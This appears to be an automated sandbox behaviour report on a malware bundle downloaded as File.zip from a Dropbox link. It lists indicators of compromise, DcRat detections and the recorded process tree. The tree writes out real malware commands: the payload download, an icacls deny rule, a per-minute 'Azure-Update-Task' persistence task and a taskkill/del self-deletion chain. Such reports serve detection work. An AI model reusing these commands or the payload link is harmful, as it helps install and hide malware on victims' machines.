2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
59600 | ybRTF_ZrBzghRmdqS2tL_QaU.exe
59600 | ybRTF_ZrBzghRmdqS2tL_QaU.exe
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
pid | process
2220 |
71628 | Adblock.exe
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
pid | process
5752 | uV50xbiY4LlMWsebJOoi_R_O.exe
71064 | 5PzEorzxArsuyso_tUF64BQZ.exe
2220 |
2220 |
2220 |
2220 |
25368 | 1AAF.exe
12716 | gtdcvsc
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
Processes:
pid | process
4880 | msedge.exe
4880 | msedge.exe
4880 | msedge.exe
4880 | msedge.exe
4880 | msedge.exe
4880 | msedge.exe
4880 | msedge.exe
4880 | msedge.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 5772 | oMPcKCByxz6c6aQOVuge8D1R.exe
Token: SeDebugPrivilege | 73588 | K94I82H7GA442K5.exe
Token: SeDebugPrivilege | 380 | n2bxaZuE24qU0suJTAECSlqq.exe
Token: SeDebugPrivilege | 4272 | 4CBGCHM82DE58EB.exe
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeDebugPrivilege | 6044 | eHFS6NZuqQ_xO0mJVksaQreP.exe
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeDebugPrivilege | 6036 | nnb09fHefcHKAg9TUhBoFZHP.exe
Token: SeDebugPrivilege | 5800 | 75huro8A6uIQ4Z3yLnBxmNPI.exe
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeBackupPrivilege | 53416 | robocopy.exe
Token: SeRestorePrivilege | 53416 | robocopy.exe
Token: SeSecurityPrivilege | 53416 | robocopy.exe
Token: SeTakeOwnershipPrivilege | 53416 | robocopy.exe
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeShutdownPrivilege | 2220 |
Token: SeCreatePagefilePrivilege | 2220 |
Token: SeShutdownPrivilege | 2220 |
Suspicious use of FindShellTrayWindow 40 IoCs
Processes:
pid | process
4880 | msedge.exe
4880 | msedge.exe
4880 | msedge.exe
4880 | msedge.exe
4880 | msedge.exe
4880 | msedge.exe
4880 | msedge.exe
4880 | msedge.exe
4880 | msedge.exe
4880 | msedge.exe
4880 | msedge.exe
4880 | msedge.exe
4880 | msedge.exe
53464 | 36tK0gCUVT2orDhALS0_tIKC.tmp
71628 | Adblock.exe
2220 |
2220 |
20368 | Respect.exe.pif
2220 |
2220 |
20368 | Respect.exe.pif
20368 | Respect.exe.pif
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
Suspicious use of SendNotifyMessage 31 IoCs
Processes:
pid | process
71628 | Adblock.exe
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
2220 |
20368 | Respect.exe.pif
20368 | Respect.exe.pif
20368 | Respect.exe.pif
Suspicious use of SetWindowsHookEx 52 IoCs
Processes:
pid | process
5276 | Install.exe
5716 | m7tpR8y__P6zIjNc638scLmV.exe
5788 | VQbpujdSGomqnbS9WjiyreEK.exe
5752 | uV50xbiY4LlMWsebJOoi_R_O.exe
5764 | _TiaXZiUu6XgZbvoAZY2sRH0.exe
5728 | 5dql7piSRHDDYa_r8buffZkT.exe
5776 | 7c54za4xnx_ox5Ogv39y8LB9.exe
5812 | r66VAUj92jmJRCibPDw4l9Kb.exe
6012 | Dj7oV6pePcIXJQ2f96mvaT24.exe
5992 | KJN4UTMVm4u4hm7saACgHkd5.exe
6072 | 6nu8WAAz96Ll697FGgrU_0Ep.exe
5736 | SN8pRGmvfIetO31nMREgZCBd.exe
73612 | 0JE7G3LK557H5E8.exe
45648 | KJN4UTMVm4u4hm7saACgHkd5.exe
2140 | VQbpujdSGomqnbS9WjiyreEK.exe
2760 | 368C0412AGB029I.exe
2760 | 368C0412AGB029I.exe
59600 | ybRTF_ZrBzghRmdqS2tL_QaU.exe
4504 | AppLaunch.exe
59796 | RegAsm.exe
59760 | AppLaunch.exe
51472 | 5PzEorzxArsuyso_tUF64BQZ.exe
51484 | XqFLMvUeBEg_P943krgYtWkU.exe
51492 | 36tK0gCUVT2orDhALS0_tIKC.exe
51508 | 2Se_pjJglnDpbeqjf2ldznTA.exe
51516 | ktN6_OKyWBLIic4tRrS6Y7lW.exe
51524 | YisnVpUhrZ2PWS7ZEq2F4LK4.exe
51532 | I8dJ1qS1rcI5yzla9SoRu01p.exe
51464 | nvNlamGS3lVvMXNb9dzkJmr7.exe
51540 | qOxMIfZDfCKOLU4NJPxsAIR6.exe
53464 | 36tK0gCUVT2orDhALS0_tIKC.tmp
9452 | Install.exe
70660 | Install.exe
70700 | VQbpujdSGomqnbS9WjiyreEK.exe
71616 | VQbpujdSGomqnbS9WjiyreEK.exe
71628 | Adblock.exe
5528 | crashpad_handler.exe
71628 | Adblock.exe
71628 | Adblock.exe
5132 | build2.exe
5440 | AdblockInstaller.exe
6184 | build3.exe
6200 | AdblockInstaller.tmp
71628 | Adblock.exe
71628 | Adblock.exe
10468 | DnsService.exe
10508 | DnsService.exe
10572 | build2.exe
16964 | cmd.exe
19680 | xsv.exe
20368 | Respect.exe.pif
12316 | Respect.exe.pif
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid | process
2220 |
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process
PID 1928 wrote to memory of 4880 | 1928 | cmd.exe | msedge.exe
PID 1928 wrote to memory of 4880 | 1928 | cmd.exe | msedge.exe
PID 4880 wrote to memory of 480 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 480 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 1988 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 4980 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 4980 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 2876 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 2876 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 2876 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 2876 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 2876 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 2876 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 2876 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 2876 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 2876 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 2876 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 2876 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 2876 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 2876 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 2876 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 2876 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 2876 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 2876 | 4880 | msedge.exe | msedge.exe
PID 4880 wrote to memory of 2876 | 4880 | msedge.exe | msedge.exe
outlook_office_path 1 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | explorer.exe
outlook_win_path 1 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | explorer.exe
Processes
-
C:\Windows\system32\cmd.exe (depth 1)
  cmd /c start microsoft-edge:https://www.dropbox.com/s/v74d5j0q01fe6uk/File.zip?dl=0
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://www.dropbox.com/s/v74d5j0q01fe6uk/File.zip?dl=0
- DcRat
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 3)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xdc,0x104,0x7ffcc58746f8,0x7ffcc5874708,0x7ffcc5874718
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 3)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 3)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 3)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 3)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3936 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 3)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 3)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4368 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 3)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 3)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 3)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6108 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (depth 3)
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6508 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe (depth 3)
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe (depth 4)
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff7dc445460,0x7ff7dc445470,0x7ff7dc445480
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6508 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5756 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5748 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6712 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6628 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3252 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2088,14939450888349593330,4144735002298982094,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:83⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\Temp1_File.zip\Install.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_File.zip\Install.exe"1⤵
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\r66VAUj92jmJRCibPDw4l9Kb.exe"C:\Users\Admin\Pictures\Minor Policy\r66VAUj92jmJRCibPDw4l9Kb.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\75huro8A6uIQ4Z3yLnBxmNPI.exe"C:\Users\Admin\Pictures\Minor Policy\75huro8A6uIQ4Z3yLnBxmNPI.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"3⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe"C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe"C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe"3⤵
- DcRat
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\fc9a62cb-7d5f-48e5-9c75-c63867ff4d84" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
-
C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe"C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe"C:\Users\Admin\Pictures\Minor Policy\VQbpujdSGomqnbS9WjiyreEK.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build2.exe"C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build2.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build2.exe"C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build2.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" ȸo/c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build2.exe" & del C:\PrograData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build3.exe"C:\Users\Admin\AppData\Local\bffb4f07-4c3f-4e92-abbe-a14842109c04\build3.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Minor Policy\7c54za4xnx_ox5Ogv39y8LB9.exe"C:\Users\Admin\Pictures\Minor Policy\7c54za4xnx_ox5Ogv39y8LB9.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /U /s .\eTcHXU.OjD3⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Minor Policy\_TiaXZiUu6XgZbvoAZY2sRH0.exe"C:\Users\Admin\Pictures\Minor Policy\_TiaXZiUu6XgZbvoAZY2sRH0.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5764 -s 4763⤵
- Program crash
-
C:\Users\Admin\Pictures\Minor Policy\uV50xbiY4LlMWsebJOoi_R_O.exe"C:\Users\Admin\Pictures\Minor Policy\uV50xbiY4LlMWsebJOoi_R_O.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
